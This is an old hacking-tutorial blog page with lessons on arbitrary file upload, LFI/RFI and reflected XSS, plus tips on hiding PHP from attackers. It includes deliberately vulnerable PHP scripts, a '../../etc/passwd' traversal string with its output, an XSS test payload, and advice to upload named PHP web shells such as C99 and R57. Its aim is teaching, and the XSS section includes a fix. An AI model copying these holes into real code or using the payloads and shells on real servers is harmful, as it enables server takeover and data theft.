Connect With Me In Facebook

Welcome to DefendHackers, If u want to Apply for a Blogroll as a Author , With h4ckfreak Mail me @ suren.click@gmail.com

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends

By h4ckfreak

Metasploit Quick Start Referennce Guide

Metasploit Quick Start Referennce Guide , By h4ckfreak

IP Security

IP Security By H4ckfreak.

15 Network Admin Apps for Android

15 Network Admin Apps for Android , By h4ckfreak

Break All OS Passwords Using KON

Break All OS Passwords Using KON , By h4ckfreak

Recover Or Reset Ur Windows Pwd Using Ubuntu

Recover Or Reset Ur Windows Pwd Using Ubuntu , By h4ckfreak

Security Blueprint For Ethical Hackers..

By h4ckfreak

Blocking IP Using IPSec

By h4ckfreak

Preventing DDos Attacks, Combat Steps abd Tools...

By h4ckfreak

Monday, December 19, 2011

Basics of Arbitary File Upload

As the name suggests Arbitrary File Upload Vulnerabilities is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.

The main danger of these kind of vulnerabilities is that the attacker can upload a malicious PHP , ASP etc. script and execute it. The main idea is to get the access to the server and execute desired code. for example an Attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and the victim’s server gets owned.

In this tutorial we’ll be looking at a a basic example of a Vulnerable Script and How to exploit it. So let’s get started.

Proof of Concept



For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php
Code:
<?php
   
  /**
   * @author lionaneesh
   * @copyright 2011
   * @page upload.php
   */
   
  // If the upload request has been made , Upload the file
   
  $uploadMessage = "";
   
  if (isset($_POST['upload']))
  {
        $path = $_FILES['uploadFile']['name'];
        if(move_uploaded_file($_FILES['uploadFile']['tmp_name'],$path) == TRUE)
        {
              $uploadMessage = "File Uploaded <a href='$path'>HERE</a>";
        }
  }
   
  ?>
   
  <html>
   
  <head>
   
      <title>Welcome to Vulnerable Apps</title>
   
  </head>
   
  <body>
   
  <h1>Arbitary file upload ( POC )</h1>
  <hr />
   
  <p>Hey all this is a sample php script to upload image files , This script doesn't contains file type checking code which makes it prone to Arbitary file upload vulnerbility. </p>
   
  <hr />
  <h2>Upload</h2>
  <hr />
   
  <table>
  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
      <tr>
      
          <td width="100">Upload File </td>
          <td width="380"><input class="cmd" type="file" name="uploadFile"/></td>
          <td><input style="margin-left:20px;" type="submit" name="upload" class="own" value="Upload"/></td>
      
      </tr>
  </form>
  </table>
  <?php
   
  echo $uploadMessage;
   
  ?>
   
  </body>
   
  </html>
In the above script we simply ask the user to input the file to be uploaded and without even checking what the file-type is or its extension we upload it.

This is a basic example of how these bugs occur.

How to exploit it



Now to exploit this common bug is yet simpler, the hacker can simply download any Web Shell-Scripts , Written in PHP , ASP etc.

Some PHP Shells :-

Ani-Shell
[ R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the hacker have to carry out some steps :-

Upload the Shell



Go to the link



Gain Access



That's it for this tutorial stay tuned for more.

Tell the World ...

Basics of LFI and RFI Attacks



Local File Inclusion ( LFI ) is a method of including files on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like , include() , require() etc.) . Mostly these attacks are accompanied by Directory Transversal attacks which can reveal some sensitive data leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]



I have created a pair of files named index.html and lfi.php
lfi.php
Code:
<html>
   <head>
   <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>   
  <body>
   
   <h1>Welcome to this Website</h1>
   
  <?php $page = isset($_GET['page']) ? $_GET['page'] : 'index.html'; ?>
   
   <p>You are currently at <?php echo"<a href='$page'>$page</a>";?></p>
   
   <?php include($page); ?>
   </body>
  </html>
As you see the above code has a include(USER_INPUT) So basically we can input any filename and it will simply print out the contents on the screen. This is the most popular form in which these bugs occur.
index.html
Code:
<p>Hello I am a sample page my name is index.html</p>
Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-
Code:
Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html
It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string


As I am working on UNIX we’ll print out the contents of /etc/passwd file , The file /etc/passwd is a local source of information about users' accounts.

My present working directory is /var/www/ , So what I have to do is :-
  1. Go back 2 directories and
  2. Then go to /etc/passwd
We can go back 2 directories using ‘../../’

Attack string :-

Code:
../../etc/passwd
Now lets feed this as an input and see what happens.

Input: “ ../../etc/passwd”

Code:
Welcome to this Website

  You are currently at ../../etc/passwd 
  root:x:0:1:Super-User:/root:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/
And voila! We just printed the /etc/passwd file.

Remote File Inclusion



RFI is an abbreviation for Remove File Inclusion and is quite similar to LFI, Remote File Inclusion ( RFI ) is a method of including Remote files(present on another server) on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like, include (), require () etc.)

Demonstration [Proof of Concept]



We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert’s index file in our local file.

So what we have to do is, simply provide the URI as an input and see what happens

Input : http://go4expert.com

Output (page source):-
Code:
<html>
<head>
                       <title>Vulnerable to LFI -- by lionaneesh</title>
 </head>

 <body>

 <h1>Welcome to this Website</h1>

  <p>You are currently at <a href='http://go4expert.com'>http://go4expert.com</a>

</p> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>         <meta http-equiv="Cache-Control" content="no-cache" />        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />  
<title>Programming and SEO Forums </title> 

<!-- ChartBeat -->

<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<!-- /ChartBeat --> 

 --------Sniped-----------


Note: In most modern ‘php.ini’ files, allow_url_include is set to off which would not allow a malicious user to include a remote file.

Basics of XSS, How the Logic Works



Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS



This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo



Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php
Code: php
<html> <head>     <title>Vulnerable to XSS</title> </head> </html> <body> <h1>Welcome to XSS Demo Page</h1> <p>The Data Entered is As Follows :- </p> <?php /**  * @author lionaneesh  * @copyright 2011  */   if(isset($_GET['data'])) {     $data = $_GET['data']; } else {     $data = "No Data Entered !"; } echo "<i>$data</i>"; ?> </body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them



If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)
Code: php
echo htmlspecialchars("<i>$data</i>");
Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

That’s all for this tutorial stay tuned for more

For advanced reading click here

Thanks,

Greyhat

Obfuscating PHP


I must say that hiding or obfuscating is not the most effective ways of security but it’s still effective to keep a Script Kiddy confused about what actually you are using in your server.

As an example - Server may use vulnerable version of PHP, with a public exploit released at some underground markets, Most of the time a simple automated exploit is released to help the “Point-Click-Hackers” (Script Kiddies). Now all they have to find is which Version of PHP you are using and if it is vulnerable, Point the exploit, launch it and own your system. In these cases obfuscating can really help you a lot.


By PHP obfuscation you can hide PHP, Which means you can stop or slow down a hacker attacking your machine.


In this tutorial, we’ll be looking at some of the most popular methods used by Site Administrators to Hide PHP , So let’s get started.

Editing php.ini file



PHP as a default exposes the fact that if it is installed on a server or not, by adding its signature to the Web server header which can really be lethal in some cases.


To set this off , Simply go to your php installation directory under “conf_files” , you can find your standard PHP Configuration file named “php.ini”


Now under this file , go to the “Miscellaneous” section and simply turn expose_php to Off.

Spoofing



By adding a simple line of code you can actually fool an attacker about what service are you using.


Spoof.php

Code: php
<?php error_reporting(0); header("X-Powered-By: My Programming Language"); ?>
Note: The header call should be made before you send any data to the client.

Using Some Basic Apache Rules



Most Web servers like Apache etc. Can be configured to use some basic rules that would allow to parse different file-types with PHP.


EG:-


A file like index.php, gives a straight clue to the attacker that the server is using php. But if we can use some basic server configuration to actually allow a extension like “.mpl” etc to parse PHP code. The attacker will certainly have no clue about the file extension.


For the Scope of this tutorial I’ll only be covering some Apache Rules/Configurations, but if you need help with some other servers, feel free to comment or PM me.


The configurations can be added either using the .htaccess directive or directly through the Apache Configurations file. Just add the following set of rules


Syntax :-

Code:
AddType application/x-httpd-php .extenstion
Example :-
Code:
AddType application/x-httpd-php .mpl .mp3 .py .asp
Note : Only use those extensions which are normally not used by the server , for example don’t use .txt extension as the server will interpret .txt as PHP code and if it contains some php , it will be executed.

Conclusion



Obfuscation is not the most effective way of security and at most of the times, it doesn’t help, as a professional hacker would already know these modifications and can easily make out what you are trying to hide. But obfuscation would really slow down the attacker and will keep away some script kiddies. It is better to obfuscate than rather telling him what he wants.